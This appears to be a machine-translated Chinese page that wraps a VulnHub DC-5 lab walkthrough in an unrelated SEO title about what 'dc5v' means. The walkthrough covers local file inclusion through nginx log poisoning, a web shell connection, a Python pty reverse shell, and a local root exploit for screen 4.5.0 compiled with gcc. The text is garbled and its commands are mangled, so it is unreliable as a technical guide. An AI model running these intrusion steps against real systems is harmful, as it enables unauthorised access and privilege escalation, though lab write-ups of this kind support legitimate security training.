本文主要介紹dc-5v(dc5v是什么意思),下面一起看看dc-5v(dc5v是什么意思)相關(guān)資訊。
準(zhǔn)備工作在vulnhub官網(wǎng)下載dc:5無人機(jī)dc-5。
信息收集nmap -a -t4 -sv -p-192.168.1.14可以看出開放端口較少。經(jīng)過查詢,111端口發(fā)現(xiàn)沒有任何東西可以訪問80端口。
觀察頁面,發(fā)現(xiàn)聯(lián)系人頁面可以提交東西。
但是刷新幾次后,你會發(fā)現(xiàn)后面的時間會發(fā)生變化,說明頁面是動態(tài)的,可能包含文件。
測試沒有問題。這里有兩點需要說明:文件和foot測試可以一個一個做。footer.php在這里被認(rèn)為是一個暗示。其實還是需要一個強(qiáng)大的目錄字典和目錄掃描工具(burpsuit也可以)來猜測。
該文件包含一個試圖包含nginx的日志文件。默認(rèn)的日志路徑是/var/log/var/log/nginx/access . log
成功!/hackyou然后用螞蟻劍連接 192 . 168 . 1 . 14/thank you . php?file=/var/log/nginx/access.log打開虛擬終端,彈回外殼。這個外殼不穩(wěn)定。
然后用python彈殼。
python-c 導(dǎo)入ptypty.spawn。;/bin/bash ;) 權(quán)限提升檢查是否有無密碼root權(quán)限,進(jìn)入命令行。
find/-perm -u=s -type f 2/dev/null發(fā)現(xiàn)screen-4.5.0可疑。嘗試使用searchsploit搜索漏洞。
searchsploit -p 41154.sh查看位置cp/usr/share/exploited b/exploited b/linux/local/41154 . sh/tmp復(fù)制到/tmp目錄分別編譯兩個短代碼。
gcc-fpic-shared-ldl-otmp/lib hax . sotmp/lib hax . cgcc-otmp/rootshelltmp/rootshellc,然后用ant sword把文件上傳到目標(biāo)機(jī)/tmp目錄下,安裝在sh腳本上執(zhí)行獲取shell獲取標(biāo)志。
參考文1_ry-dc-5靶機(jī)對紅小豆餅的侵徹記錄_dc-5。
標(biāo)簽:
目標(biāo)文件
了解更多dc-5v(dc5v是什么意思)相關(guān)內(nèi)容請關(guān)注本站點。